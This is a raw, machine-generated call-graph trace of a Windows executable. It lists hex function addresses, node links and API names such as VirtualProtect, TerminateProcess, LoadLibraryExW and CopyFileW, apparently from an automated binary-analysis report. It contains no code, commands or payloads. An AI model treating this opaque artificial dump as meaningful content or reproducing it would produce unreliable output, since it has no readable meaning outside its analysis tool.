4cea9f 93351->93352 93810 47bc74 48 API calls 93352->93810 93354 4ceaaf 93355 483200 334 API calls 93354->93355 93355->93349 93356->93217 93357->93217 93358->93221 93360 476f00 93359->93360 93361 476ef8 93359->93361 93360->93216 94885 47dd47 48 API calls _memcpy_s 93361->94885 93363->93216 93364->93188 93365->93216 93366->93216 93367->93206 93368->93200 93369->93215 93373 48f4f2 __calloc_impl 93370->93373 93372 48f50c 93372->93255 93373->93372 93374 48f50e std::exception::exception 93373->93374 93386 49395c 93373->93386 93400 496805 RaiseException 93374->93400 93376 48f538 93401 49673b 47 API calls _free 93376->93401 93378 48f54a 93378->93255 93379->93255 93380->93255 93381->93254 93382->93254 93383->93247 93384->93242 93385->93256 93387 4939d7 __calloc_impl 93386->93387 93390 493968 __calloc_impl 93386->93390 93407 497c0e 47 API calls __getptd_noexit 93387->93407 93388 493973 93388->93390 93402 4981c2 47 API calls __NMSG_WRITE 93388->93402 93403 49821f 47 API calls 5 library calls 93388->93403 93404 491145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93388->93404 93390->93388 93392 49399b RtlAllocateHeap 93390->93392 93395 4939c3 93390->93395 93398 4939c1 93390->93398 93392->93390 93393 4939cf 93392->93393 93393->93373 93405 497c0e 47 API calls __getptd_noexit 93395->93405 93406 497c0e 47 API calls __getptd_noexit 93398->93406 93400->93376 93401->93378 93402->93388 93403->93388 93405->93398 93406->93393 93407->93393 93409 479384 93408->93409 93426 479380 93408->93426 93410 4e4bbf 93409->93410 93411 479398 93409->93411 93414 4e4cbd __i64tow 93409->93414 93421 4793b0 __itow Mailbox _wcscpy 93409->93421 93412 4e4ca5 93410->93412 93417 4e4bc8 93410->93417 93457 49172b 80 API calls 3 library calls 93411->93457 93458 49172b 80 API calls 3 library calls 93412->93458 93414->93414 93415 48f4ea 48 API calls 93418 4793ba 93415->93418 93419 4e4be7 93417->93419 93417->93421 93422 47ce19 48 API calls 93418->93422 93418->93426 93420 48f4ea 48 API calls 93419->93420 93423 4e4c04 93420->93423 93421->93415 93422->93426 93424 48f4ea 48 API calls 93423->93424 93425 4e4c2a 93424->93425 93425->93426 93427 47ce19 48 API calls 93425->93427 93426->93259 93427->93426 93459 476b0f 93428->93459 93430 47b69b 93477 47ba85 93430->93477 93432 47b6b5 Mailbox 93432->93261 93435 4e397b 93498 4b26bc 88 API calls 4 library calls 93435->93498 93437 47b9e4 93499 4b26bc 88 API calls 4 library calls 93437->93499 93439 4e3973 93439->93432 93442 47ba85 48 API calls 93447 47b495 93442->93447 93443 4e3989 93445 47ba85 48 API calls 93443->93445 93444 47bcce 48 API calls 93444->93447 93445->93439 93446 4e3909 93494 476b4a 93446->93494 93447->93430 93447->93435 93447->93437 93447->93442 93447->93444 93447->93446 93455 4e3939 _memcpy_s 93447->93455 93464 47c413 59 API calls 93447->93464 93465 47bb85 93447->93465 93470 47bdfa 93447->93470 93476 47bc74 48 API calls 93447->93476 93485 47c6a5 49 API calls 93447->93485 93486 47c799 93447->93486 93450 4e3914 93454 48f4ea 48 API calls 93450->93454 93453 47b66c CharUpperBuffW 93453->93447 93454->93455 93497 4b26bc 88 API calls 4 library calls 93455->93497 93456->93265 93457->93421 93458->93421 93460 48f4ea 48 API calls 93459->93460 93461 476b34 93460->93461 93462 476b4a 48 API calls 93461->93462 93463 476b43 93462->93463 93463->93447 93464->93447 93466 47bb9b 93465->93466 93469 47bb96 _memcpy_s 93465->93469 93467 4e1b77 93466->93467 93500 48ee75 93466->93500 93469->93447 93471 47be0d 93470->93471 93475 47be0a _memcpy_s 93470->93475 93472 48f4ea 48 API calls 93471->93472 93473 47be17 93472->93473 93474 48ee75 48 API calls 93473->93474 93474->93475 93475->93453 93476->93447 93478 47bb25 93477->93478 93481 47ba98 _memcpy_s 93477->93481 93480 48f4ea 48 API calls 93478->93480 93479 48f4ea 48 API calls 93482 47ba9f 93479->93482 93480->93481 93481->93479 93483 48f4ea 48 API calls 93482->93483 93484 47bac8 93482->93484 93483->93484 93484->93432 93485->93447 93487 47c7b0 93486->93487 93488 4e1f17 93486->93488 93490 47c7bd _memcpy_s 93487->93490 93493 48ee75 48 API calls 93487->93493 93489 476b4a 48 API calls 93488->93489 93491 4e1f21 93489->93491 93490->93447 93492 48f4ea 48 API calls 93491->93492 93492->93490 93493->93490 93495 48f4ea 48 API calls 93494->93495 93496 476b54 93495->93496 93496->93450 93497->93439 93498->93443 93499->93439 93502 48f4ea __calloc_impl 93500->93502 93501 49395c __crtLCMapStringA_stat 47 API calls 93501->93502 93502->93501 93503 48f50c 93502->93503 93504 48f50e std::exception::exception 93502->93504 93503->93469 93509 496805 RaiseException 93504->93509 93506 48f538 93510 49673b 47 API calls _free 93506->93510 93508 48f54a 93508->93469 93509->93506 93510->93508 93512 47936c 81 API calls 93511->93512 93513 4cf8ea 93512->93513 93538 4cf92c Mailbox 93513->93538 93547 4d0567 93513->93547 93515 4cfb8b 93516 4cfcfa 93515->93516 93520 4cfb95 93515->93520 93622 4d0688 89 API calls Mailbox 93516->93622 93519 4cfd07 93519->93520 93522 4cfd13 93519->93522 93560 4cf70a 93520->93560 93521 47936c 81 API calls 93542 4cf984 Mailbox 93521->93542 93522->93538 93527 4cfbc9 93574 48ed18 93527->93574 93530 4cfbfd 93578 48c050 93530->93578 93531 4cfbe3 93620 4bcc5c 86 API calls 4 library calls 93531->93620 93534 4cfc14 93536 481b90 48 API calls 93534->93536 93546 4cfc3e 93534->93546 93535 4cfbee GetCurrentProcess TerminateProcess 93535->93530 93539 4cfc2d 93536->93539 93537 4cfd65 93537->93538 93543 4cfd7e FreeLibrary 93537->93543 93538->93268 93540 4d040f 105 API calls 93539->93540 93540->93546 93542->93515 93542->93521 93542->93538 93618 4d29e8 48 API calls _memcpy_s 93542->93618 93619 4cfda5 60 API calls 2 library calls 93542->93619 93543->93538 93546->93537 93589 481b90 93546->93589 93605 4d040f 93546->93605 93621 47dcae 50 API calls Mailbox 93546->93621 93548 47bdfa 48 API calls 93547->93548 93549 4d0582 CharLowerBuffW 93548->93549 93623 4b1f11 93549->93623 93556 4d05d2 93636 47b18b 93556->93636 93558 4d05de Mailbox 93559 4d061a Mailbox 93558->93559 93640 4cfda5 60 API calls 2 library calls 93558->93640 93559->93542 93561 4cf77a 93560->93561 93562 4cf725 93560->93562 93566 4d0828 93561->93566 93563 48f4ea 48 API calls 93562->93563 93565 4cf747 93563->93565 93564 48f4ea 48 API calls 93564->93565 93565->93561 93565->93564 93567 4d0a53 Mailbox 93566->93567 93573 4d084b _strcat _wcscpy __NMSG_WRITE 93566->93573 93567->93527 93568 47d286 48 API calls 93568->93573 93569 47cf93 58 API calls 93569->93573 93570 47936c 81 API calls 93570->93573 93571 49395c 47 API calls __crtLCMapStringA_stat 93571->93573 93573->93567 93573->93568 93573->93569 93573->93570 93573->93571 93643 4b8035 50 API calls __NMSG_WRITE 93573->93643 93575 48ed2d 93574->93575 93576 48edc5 VirtualProtect 93575->93576 93577 48ed93 93575->93577 93576->93577 93577->93530 93577->93531 93579 48c064 93578->93579 93581 48c069 Mailbox 93578->93581 93644 48c1af 48 API calls 93579->93644 93586 48c077 93581->93586 93645 48c15c 48 API calls 93581->93645 93583 48f4ea 48 API calls 93585 48c108 93583->93585 93584 48c152 93584->93534 93587 48f4ea 48 API calls 93585->93587 93586->93583 93586->93584 93588 48c113 93587->93588 93588->93534 93588->93588 93590 481cf6 93589->93590 93593 481ba2 93589->93593 93590->93546 93591 481bae 93596 481bb9 93591->93596 93647 48c15c 48 API calls 93591->93647 93593->93591 93594 48f4ea 48 API calls 93593->93594 93595 4e49c4 93594->93595 93598 48f4ea 48 API calls 93595->93598 93597 481c5d 93596->93597 93599 48f4ea 48 API calls 93596->93599 93597->93546 93604 4e49cf 93598->93604 93600 481c9f 93599->93600 93601 481cb2 93600->93601 93646 472925 48 API calls 93600->93646 93601->93546 93603 48f4ea 48 API calls 93603->93604 93604->93591 93604->93603 93606 4d0427 93605->93606 93617 4d0443 93605->93617 93607 4d044f 93606->93607 93608 4d042e 93606->93608 93609 4d04f8 93606->93609 93606->93617 93656 47cdb9 48 API calls 93607->93656 93654 4b7c56 50 API calls _strlen 93608->93654 93657 4b9dc5 103 API calls 93609->93657 93614 4d0438 93655 47cdb9 48 API calls 93614->93655 93615 4d051e 93615->93546 93617->93615 93648 491c9d 93617->93648 93618->93542 93619->93542 93620->93535 93621->93546 93622->93519 93624 4b1f3b __NMSG_WRITE 93623->93624 93625 4b1f79 93624->93625 93626 4b1f6f 93624->93626 93629 4b1ffa 93624->93629 93625->93558 93630 47d7f7 93625->93630 93626->93625 93641 48d37a 60 API calls 93626->93641 93629->93625 93642 48d37a 60 API calls 93629->93642 93631 48f4ea 48 API calls 93630->93631 93632 47d818 93631->93632 93633 48f4ea 48 API calls 93632->93633 93634 47d826 93633->93634 93635 4769e9 48 API calls _memcpy_s 93634->93635 93635->93556 93637 47b199 93636->93637 93639 47b1a2 _memcpy_s 93636->93639 93638 47bdfa 48 API calls 93637->93638 93637->93639 93638->93639 93639->93558 93640->93559 93641->93626 93642->93629 93643->93573 93644->93581 93645->93586 93646->93601 93647->93596 93649 491ccf __dosmaperr 93648->93649 93650 491ca6 RtlFreeHeap 93648->93650 93649->93615 93650->93649 93651 491cbb 93650->93651 93658 497c0e 47 API calls __getptd_noexit 93651->93658 93653 491cc1 GetLastError 93653->93649 93654->93614 93655->93617 93656->93617 93657->93617 93658->93653 93660 47d654 93659->93660 93668 47d67e 93659->93668 93661 47d6c2 93660->93661 93662 47d65b 93660->93662 93663 47d6ab 93661->93663 93692 48dce0 53 API calls 93661->93692 93662->93663 93665 47d666 93662->93665 93663->93668 93691 48dce0 53 API calls 93663->93691 93690 47d9a0 53 API calls __cinit 93665->93690 93668->93292 93669->93292 93671 475197 93670->93671 93672 4e1ace 93671->93672 93673 47519f 93671->93673 93674 476b4a 48 API calls 93672->93674 93693 475130 93673->93693 93677 4e1adb __NMSG_WRITE 93674->93677 93676 4751aa 93680 47510d 93676->93680 93678 48ee75 48 API calls 93677->93678 93679 4e1b07 _memcpy_s 93678->93679 93681 47511f 93680->93681 93682 4e1be7 93680->93682 93703 47b384 93681->93703 93712 4aa58f 48 API calls _memcpy_s 93682->93712 93685 4e1bf1 93687 476eed 48 API calls 93685->93687 93686 47512b 93686->93281 93688 4e1bf9 Mailbox 93687->93688 93689->93282 93690->93668 93691->93668 93692->93663 93694 47513f __NMSG_WRITE 93693->93694 93695 475151 93694->93695 93696 4e1b27 93694->93696 93698 47bb85 48 API calls 93695->93698 93697 476b4a 48 API calls 93696->93697 93700 4e1b34 93697->93700 93699 47515e _memcpy_s 93698->93699 93699->93676 93701 48ee75 48 API calls 93700->93701 93702 4e1b57 _memcpy_s 93701->93702 93704 47b392 93703->93704 93711 47b3c5 _memcpy_s 93703->93711 93705 47b3fd 93704->93705 93706 47b3b8 93704->93706 93704->93711 93707 48f4ea 48 API calls 93705->93707 93708 47bb85 48 API calls 93706->93708 93709 47b407 93707->93709 93708->93711 93710 48f4ea 48 API calls 93709->93710 93710->93711 93711->93686 93712->93685 93713->93349 93714->93321 93715->93329 93717 48479f 93716->93717 93718 484637 93716->93718 93721 47ce19 48 API calls 93717->93721 93719 4e6e05 93718->93719 93720 484643 93718->93720 93722 4ce822 335 API calls 93719->93722 93861 484300 335 API calls _memcpy_s 93720->93861 93728 4846e4 Mailbox 93721->93728 93724 4e6e11 93722->93724 93725 484739 Mailbox 93724->93725 93862 4bcc5c 86 API calls 4 library calls 93724->93862 93725->93349 93727 484659 93727->93724 93727->93725 93727->93728 93731 4c6ff0 335 API calls 93728->93731 93811 474252 93728->93811 93817 4b6524 93728->93817 93820 4bfa0c 93728->93820 93731->93725 93733->93333 93734->93337 94668 47bd30 93735->94668 93737 483267 93739 4832f8 93737->93739 93740 4e907a 93737->93740 93798 483628 93737->93798 94741 48c36b 86 API calls 93739->94741 94747 4bcc5c 86 API calls 4 library calls 93740->94747 93741 4e9072 93741->93349 93744 4e94df 93744->93798 94768 4bcc5c 86 API calls 4 library calls 93744->94768 93745 4e909a 93754 47d645 53 API calls 93745->93754 93792 4e91fa 93745->93792 93747 483313 93747->93744 93795 4834eb _memcpy_s Mailbox 93747->93795 93747->93798 94673 472b7a 93747->94673 93748 48c3c3 48 API calls 93748->93795 93752 4833ce 93766 4e945e 93752->93766 93767 483465 93752->93767 93752->93795 93753 4e926d 94756 4bcc5c 86 API calls 4 library calls 93753->94756 93757 4e910c 93754->93757 93756 47fe30 335 API calls 93758 4e9407 93756->93758 93760 4e9220 93757->93760 93764 4e9114 93757->93764 93758->93798 94761 47d6e9 93758->94761 94753 471caa 49 API calls 93760->94753 93772 4e9128 93764->93772 93781 4e9152 93764->93781 94766 4bc942 50 API calls 93766->94766 93774 48f4ea 48 API calls 93767->93774 93769 4e9438 94765 4bcc5c 86 API calls 4 library calls 93769->94765 93770 4e923d 93775 4e925e 93770->93775 93776 4e9252 93770->93776 93771 47fe30 335 API calls 93771->93795 94748 4bcc5c 86 API calls 4 library calls 93772->94748 93784 48346c 93774->93784 94755 4bcc5c 86 API calls 4 library calls 93775->94755 94754 4bcc5c 86 API calls 4 library calls 93776->94754 93782 4e9177 93781->93782 93786 4e9195 93781->93786 94749 4cf320 335 API calls 93782->94749 93790 48351f 93784->93790 94680 47e8d0 93784->94680 93787 4e918b 93786->93787 94750 4cf5ee 335 API calls 93786->94750 93787->93798 94751 48c2d6 48 API calls _memcpy_s 93787->94751 93794 476eed 48 API calls 93790->93794 93796 483540 93790->93796 94752 4bcc5c 86 API calls 4 library calls 93792->94752 93793 48f4ea 48 API calls 93793->93795 93794->93796 93795->93745 93795->93748 93795->93753 93795->93769 93795->93771 93795->93790 93795->93793 93797 4e9394 93795->93797 93795->93798 93801 4e93c5 93795->93801 94743 47d9a0 53 API calls __cinit 93795->94743 94744 47d8c0 53 API calls 93795->94744 94745 48c2d6 48 API calls _memcpy_s 93795->94745 94757 4ccda2 82 API calls Mailbox 93795->94757 94758 4b80e3 53 API calls 93795->94758 94759 47d764 55 API calls 93795->94759 94760 47dcae 50 API calls Mailbox 93795->94760 93796->93798 93802 4e94b0 93796->93802 93804 483585 93796->93804 93800 48f4ea 48 API calls 93797->93800 93807 483635 Mailbox 93798->93807 94746 4bcc5c 86 API calls 4 library calls 93798->94746 93800->93801 93801->93756 94767 47dcae 50 API calls Mailbox 93802->94767 93804->93744 93804->93798 93805 483615 93804->93805 94742 47dcae 50 API calls Mailbox 93805->94742 93807->93349 93808->93347 93809->93350 93810->93354 93812 47425c 93811->93812 93814 474263 93811->93814 93863 4935e4 93812->93863 93815 474283 FreeLibrary 93814->93815 93816 474272 93814->93816 93815->93816 93816->93725 94166 4b6ca9 GetFileAttributesW 93817->94166 93821 4bfa1c __ftell_nolock 93820->93821 93822 4bfa44 93821->93822 94258 47d286 48 API calls 93821->94258 93824 47936c 81 API calls 93822->93824 93825 4bfa5e 93824->93825 93826 4bfb92 93825->93826 93827 4bfb68 93825->93827 93828 4bfa80 93825->93828 93826->93725 94170 4741a9 93827->94170 93830 47936c 81 API calls 93828->93830 93836 4bfa8c _wcscpy _wcschr 93830->93836 93832 4bfb8e 93832->93826 93834 47936c 81 API calls 93832->93834 93833 4741a9 136 API calls 93833->93832 93835 4bfbc7 93834->93835 94194 491dfc 93835->94194 93840 4bfab0 _wcscat _wcscpy 93836->93840 93843 4bfade _wcscat 93836->93843 93838 47936c 81 API calls 93839 4bfafc _wcscpy 93838->93839 94259 4b72cb GetFileAttributesW 93839->94259 93842 47936c 81 API calls 93840->93842 93842->93843 93843->93838 93844 4bfb1c __NMSG_WRITE 93844->93826 93846 47936c 81 API calls 93844->93846 93845 4bfbeb _wcscat _wcscpy 93849 47936c 81 API calls 93845->93849 93847 4bfb48 93846->93847 94260 4b60dd 77 API calls 4 library calls 93847->94260 93851 4bfc82 93849->93851 93850 4bfb5c 93850->93826 94197 4b690b 93851->94197 93853 4bfca2 93854 4b6524 3 API calls 93853->93854 93855 4bfcb1 93854->93855 93856 47936c 81 API calls 93855->93856 93858 4bfce2 93855->93858 93857 4bfccb 93856->93857 94203 4bbfa4 93857->94203 93860 474252 84 API calls 93858->93860 93860->93826 93861->93727 93862->93725 93864 4935f0 _doexit 93863->93864 93865 49361c 93864->93865 93866 493604 93864->93866 93872 493614 _doexit 93865->93872 93876 494e1c 93865->93876 93898 497c0e 47 API calls __getptd_noexit 93866->93898 93869 493609 93899 496e10 8 API calls __wtof_l 93869->93899 93872->93814 93877 494e2c 93876->93877 93878 494e4e EnterCriticalSection 93876->93878 93877->93878 93879 494e34 93877->93879 93880 49362e 93878->93880 93901 497cf4 93879->93901 93882 493578 93880->93882 93883 49359b 93882->93883 93884 493587 93882->93884 93890 493597 93883->93890 93939 492c84 93883->93939 93979 497c0e 47 API calls __getptd_noexit 93884->93979 93886 49358c 93980 496e10 8 API calls __wtof_l 93886->93980 93900 493653 LeaveCriticalSection LeaveCriticalSection _fprintf 93890->93900 93894 4935b5 93956 49e9d2 93894->93956 93896 4935bb 93896->93890 93897 491c9d _free 47 API calls 93896->93897 93897->93890 93898->93869 93899->93872 93900->93872 93902 497d18 EnterCriticalSection 93901->93902 93903 497d05 93901->93903 93902->93880 93908 497d7c 93903->93908 93905 497d0b 93905->93902 93932 49115b 47 API calls 3 library calls 93905->93932 93909 497d88 _doexit 93908->93909 93910 497da9 93909->93910 93911 497d91 93909->93911 93918 497e11 _doexit 93910->93918 93924 497da7 93910->93924 93933 4981c2 47 API calls __NMSG_WRITE 93911->93933 93913 497d96 93934 49821f 47 API calls 5 library calls 93913->93934 93916 497dbd 93919 497dd3 93916->93919 93920 497dc4 93916->93920 93917 497d9d 93935 491145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93917->93935 93918->93905 93923 497cf4 __lock 46 API calls 93919->93923 93937 497c0e 47 API calls __getptd_noexit 93920->93937 93926 497dda 93923->93926 93924->93910 93936 4969d0 47 API calls __crtLCMapStringA_stat 93924->93936 93925 497dc9 93925->93918 93927 497de9 InitializeCriticalSectionAndSpinCount 93926->93927 93928 497dfe 93926->93928 93929 497e04 93927->93929 93930 491c9d _free 46 API calls 93928->93930 93938 497e1a LeaveCriticalSection _doexit 93929->93938 93930->93929 93933->93913 93934->93917 93936->93916 93937->93925 93938->93918 93940 492cbb 93939->93940 93941 492c97 93939->93941 93945 49eb36 93940->93945 93941->93940 93942 492933 __stbuf 47 API calls 93941->93942 93943 492cb4 93942->93943 93981 49af61 93943->93981 93946 4935af 93945->93946 93947 49eb43 93945->93947 93949 492933 93946->93949 93947->93946 93948 491c9d _free 47 API calls 93947->93948 93948->93946 93950 49293d 93949->93950 93951 492952 93949->93951 94122 497c0e 47 API calls __getptd_noexit 93950->94122 93951->93894 93953 492942 94123 496e10 8 API calls __wtof_l 93953->94123 93955 49294d 93955->93894 93957 49e9de _doexit 93956->93957 93958 49e9fe 93957->93958 93959 49e9e6 93957->93959 93960 49ea7b 93958->93960 93966 49ea28 93958->93966 94139 497bda 47 API calls __getptd_noexit 93959->94139 94143 497bda 47 API calls __getptd_noexit 93960->94143 93962 49e9eb 94140 497c0e 47 API calls __getptd_noexit 93962->94140 93965 49ea80 94144 497c0e 47 API calls __getptd_noexit 93965->94144 93968 49a8ed ___lock_fhandle 49 API calls 93966->93968 93970 49ea2e 93968->93970 93969 49ea88 94145 496e10 8 API calls __wtof_l 93969->94145 93972 49ea4c 93970->93972 93973 49ea41 93970->93973 94141 497c0e 47 API calls __getptd_noexit 93972->94141 94124 49ea9c 93973->94124 93974 49e9f3 _doexit 93974->93896 93977 49ea47 94142 49ea73 LeaveCriticalSection __unlock_fhandle 93977->94142 93979->93886 93980->93890 93982 49af6d _doexit 93981->93982 93983 49af8d 93982->93983 93984 49af75 93982->93984 93985 49b022 93983->93985 93991 49afbf 93983->93991 94079 497bda 47 API calls __getptd_noexit 93984->94079 94084 497bda 47 API calls __getptd_noexit 93985->94084 93987 49af7a 94080 497c0e 47 API calls __getptd_noexit 93987->94080 93990 49b027 94085 497c0e 47 API calls __getptd_noexit 93990->94085 94006 49a8ed 93991->94006 93994 49b02f 94086 496e10 8 API calls __wtof_l 93994->94086 93995 49afc5 93997 49afd8 93995->93997 93998 49afeb 93995->93998 94015 49b043 93997->94015 94081 497c0e 47 API calls __getptd_noexit 93998->94081 94000 49af82 _doexit 94000->93940 94002 49afe4 94083 49b01a LeaveCriticalSection __unlock_fhandle 94002->94083 94003 49aff0 94082 497bda 47 API calls __getptd_noexit 94003->94082 94007 49a8f9 _doexit 94006->94007 94008 49a946 EnterCriticalSection 94007->94008 94009 497cf4 __lock 47 API calls 94007->94009 94010 49a96c _doexit 94008->94010 94011 49a91d 94009->94011 94010->93995 94012 49a928 InitializeCriticalSectionAndSpinCount 94011->94012 94013 49a93a 94011->94013 94012->94013 94087 49a970 LeaveCriticalSection _doexit 94013->94087 94016 49b050 __ftell_nolock 94015->94016 94017 49b08d 94016->94017 94018 49b0ac 94016->94018 94048 49b082 94016->94048 94097 497bda 47 API calls __getptd_noexit 94017->94097 94021 49b105 94018->94021 94022 49b0e9 94018->94022 94026 49b11c 94021->94026 94103 49f82f 49 API calls 3 library calls 94021->94103 94100 497bda 47 API calls __getptd_noexit 94022->94100 94023 49b86b 94023->94002 94024 49b092 94098 497c0e 47 API calls __getptd_noexit 94024->94098 94088 4a3bf2 94026->94088 94029 49b0ee 94101 497c0e 47 API calls __getptd_noexit 94029->94101 94031 49b099 94099 496e10 8 API calls __wtof_l 94031->94099 94032 49b12a 94035 49b44b 94032->94035 94104 497a0d 47 API calls 2 library calls 94032->94104 94037 49b7b8 WriteFile 94035->94037 94038 49b463 94035->94038 94036 49b0f5 94102 496e10 8 API calls __wtof_l 94036->94102 94042 49b7e1 GetLastError 94037->94042 94047 49b410 94037->94047 94041 49b55a 94038->94041 94051 49b479 94038->94051 94052 49b663 94041->94052 94055 49b565 94041->94055 94042->94047 94043 49b150 GetConsoleMode 94043->94035 94045 49b189 94043->94045 94044 49b81b 94044->94048 94109 497c0e 47 API calls __getptd_noexit 94044->94109 94045->94035 94049 49b199 GetConsoleCP 94045->94049 94047->94044 94047->94048 94054 49b7f7 94047->94054 94111 49a70c 94048->94111 94049->94047 94077 49b1c2 94049->94077 94050 49b4e9 WriteFile 94050->94042 94056 49b526 94050->94056 94051->94044 94051->94050 94052->94044 94057 49b6d8 WideCharToMultiByte 94052->94057 94053 49b843 94110 497bda 47 API calls __getptd_noexit 94053->94110 94059 49b7fe 94054->94059 94060 49b812 94054->94060 94055->94044 94061 49b5de WriteFile 94055->94061 94056->94047 94056->94051 94062 49b555 94056->94062 94057->94042 94071 49b71f 94057->94071 94106 497c0e 47 API calls __getptd_noexit 94059->94106 94108 497bed 47 API calls 2 library calls 94060->94108 94061->94042 94065 49b62d 94061->94065 94062->94047 94065->94047 94065->94055 94065->94062 94066 49b727 WriteFile 94068 49b77a GetLastError 94066->94068 94066->94071 94067 49b803 94107 497bda 47 API calls __getptd_noexit 94067->94107 94068->94071 94071->94047 94071->94052 94071->94062 94071->94066 94072 4a5884 WriteConsoleW CreateFileW __chsize_nolock 94075 49b2f6 94072->94075 94073 4a40f7 59 API calls __chsize_nolock 94073->94077 94074 49b28f WideCharToMultiByte 94074->94047 94076 49b2ca WriteFile 94074->94076 94075->94042 94075->94047 94075->94072 94075->94077 94078 49b321 WriteFile 94075->94078 94076->94042 94076->94075 94077->94047 94077->94073 94077->94074 94077->94075 94105 491688 57 API calls __isleadbyte_l 94077->94105 94078->94042 94078->94075 94079->93987 94080->94000 94081->94003 94082->94002 94083->94000 94084->93990 94085->93994 94086->94000 94087->94008 94089 4a3c0a 94088->94089 94090 4a3bfd 94088->94090 94092 4a3c16 94089->94092 94119 497c0e 47 API calls __getptd_noexit 94089->94119 94118 497c0e 47 API calls __getptd_noexit 94090->94118 94092->94032 94094 4a3c02 94094->94032 94095 4a3c37 94120 496e10 8 API calls __wtof_l 94095->94120 94097->94024 94098->94031 94099->94048 94100->94029 94101->94036 94102->94048 94103->94026 94104->94043 94105->94077 94106->94067 94107->94048 94108->94048 94109->94053 94110->94048 94112 49a714 94111->94112 94113 49a716 IsProcessorFeaturePresent 94111->94113 94112->94023 94115 4a37b0 94113->94115 94121 4a375f 5 API calls ___raise_securityfailure 94115->94121 94117 4a3893 94117->94023 94118->94094 94119->94095 94120->94094 94121->94117 94122->93953 94123->93955 94146 49aba4 94124->94146 94126 49eaaa 94127 49eb00 94126->94127 94128 49eade 94126->94128 94130 49aba4 __close_nolock 47 API calls 94126->94130 94159 49ab1e 48 API calls 2 library calls 94127->94159 94128->94127 94131 49aba4 __close_nolock 47 API calls 94128->94131 94133 49ead5 94130->94133 94134 49eaea CloseHandle 94131->94134 94132 49eb08 94135 49eb2a 94132->94135 94160 497bed 47 API calls 2 library calls 94132->94160 94136 49aba4 __close_nolock 47 API calls 94133->94136 94134->94127 94137 49eaf6 GetLastError 94134->94137 94135->93977 94136->94128 94137->94127 94139->93962 94140->93974 94141->93977 94142->93974 94143->93965 94144->93969 94145->93974 94147 49abaf 94146->94147 94148 49abc4 94146->94148 94161 497bda 47 API calls __getptd_noexit 94147->94161 94153 49abe9 94148->94153 94163 497bda 47 API calls __getptd_noexit 94148->94163 94150 49abb4 94162 497c0e 47 API calls __getptd_noexit 94150->94162 94153->94126 94154 49abf3 94164 497c0e 47 API calls __getptd_noexit 94154->94164 94156 49abfb 94165 496e10 8 API calls __wtof_l 94156->94165 94157 49abbc 94157->94126 94159->94132 94160->94135 94161->94150 94162->94157 94163->94154 94164->94156 94165->94157 94167 4b6cc4 FindFirstFileW 94166->94167 94169 4b6529 94166->94169 94168 4b6cd9 FindClose 94167->94168 94167->94169 94168->94169 94169->93725 94261 474214 94170->94261 94175 4741d4 LoadLibraryExW 94271 474291 94175->94271 94176 4e4f73 94177 474252 84 API calls 94176->94177 94179 4e4f7a 94177->94179 94181 474291 3 API calls 94179->94181 94183 4e4f82 94181->94183 94297 4744ed 94183->94297 94184 4741fb 94184->94183 94185 474207 94184->94185 94187 474252 84 API calls 94185->94187 94189 47420c 94187->94189 94189->93832 94189->93833 94191 4e4fa9 94305 474950 94191->94305 94559 491e46 94194->94559 94198 4b6918 _wcschr __ftell_nolock 94197->94198 94199 491dfc __wsplitpath 47 API calls 94198->94199 94202 4b692e _wcscat _wcscpy 94198->94202 94200 4b695d 94199->94200 94201 491dfc __wsplitpath 47 API calls 94200->94201 94201->94202 94202->93853 94204 4bbfb1 __ftell_nolock 94203->94204 94205 48f4ea 48 API calls 94204->94205 94206 4bc00e 94205->94206 94207 4747b7 48 API calls 94206->94207 94208 4bc018 94207->94208 94209 4bbdb4 GetSystemTimeAsFileTime 94208->94209 94210 4bc023 94209->94210 94211 474517 83 API calls 94210->94211 94212 4bc036 _wcscmp 94211->94212 94213 4bc05a 94212->94213 94214 4bc107 94212->94214 94602 4bc56d 94213->94602 94216 4bc56d 94 API calls 94214->94216 94231 4bc0d3 _wcscat 94216->94231 94218 491dfc __wsplitpath 47 API calls 94223 4bc088 _wcscat _wcscpy 94218->94223 94219 4744ed 64 API calls 94221 4bc12c 94219->94221 94220 4bc110 94220->93858 94222 4744ed 64 API calls 94221->94222 94224 4bc13c 94222->94224 94226 491dfc __wsplitpath 47 API calls 94223->94226 94225 4744ed 64 API calls 94224->94225 94227 4bc157 94225->94227 94226->94231 94228 4744ed 64 API calls 94227->94228 94229 4bc167 94228->94229 94230 4744ed 64 API calls 94229->94230 94232 4bc182 94230->94232 94231->94219 94231->94220 94233 4744ed 64 API calls 94232->94233 94234 4bc192 94233->94234 94235 4744ed 64 API calls 94234->94235 94236 4bc1a2 94235->94236 94237 4744ed 64 API calls 94236->94237 94238 4bc1b2 94237->94238 94585 4bc71a GetTempPathW GetTempFileNameW 94238->94585 94240 4bc1be 94241 493499 117 API calls 94240->94241 94251 4bc1cf 94241->94251 94242 4bc289 94243 4935e4 __fcloseall 83 API calls 94242->94243 94244 4bc294 94243->94244 94246 4bc29a DeleteFileW 94244->94246 94247 4bc2ae 94244->94247 94245 4744ed 64 API calls 94245->94251 94246->94220 94248 4bc342 CopyFileW 94247->94248 94253 4bc2b8 94247->94253 94249 4bc36a DeleteFileW 94248->94249 94250 4bc358 DeleteFileW 94248->94250 94250->94220 94251->94220 94251->94242 94251->94245 94586 492aae 94251->94586 94258->93822 94259->93844 94260->93850 94310 474339 94261->94310 94264 47423c 94266 474244 FreeLibrary 94264->94266 94267 4741bb 94264->94267 94266->94267 94268 493499 94267->94268 94318 4934ae 94268->94318 94270 4741c8 94270->94175 94270->94176 94476 4742e4 94271->94476 94274 4742b8 94275 4742c1 FreeLibrary 94274->94275 94276 4741ec 94274->94276 94275->94276 94278 474380 94276->94278 94279 48f4ea 48 API calls 94278->94279 94280 474395 94279->94280 94484 4747b7 94280->94484 94282 4743a1 _memcpy_s 94283 4743dc 94282->94283 94284 4744d1 94282->94284 94285 474499 94282->94285 94286 474950 57 API calls 94283->94286 94498 4bc750 93 API calls 94284->94498 94487 47406b CreateStreamOnHGlobal 94285->94487 94294 4743e5 94286->94294 94289 4744ed 64 API calls 94289->94294 94290 474479 94290->94184 94292 4e4ed7 94293 474517 83 API calls 94292->94293 94295 4e4eeb 94293->94295 94294->94289 94294->94290 94294->94292 94493 474517 94294->94493 94296 4744ed 64 API calls 94295->94296 94296->94290 94298 4744ff 94297->94298 94299 4e4fc0 94297->94299 94516 49381e 94298->94516 94302 4bbf5a 94536 4bbdb4 94302->94536 94304 4bbf70 94304->94191 94306 47495f 94305->94306 94307 4e5002 94305->94307 94541 493e65 94306->94541 94309 474967 94314 47434b 94310->94314 94313 474321 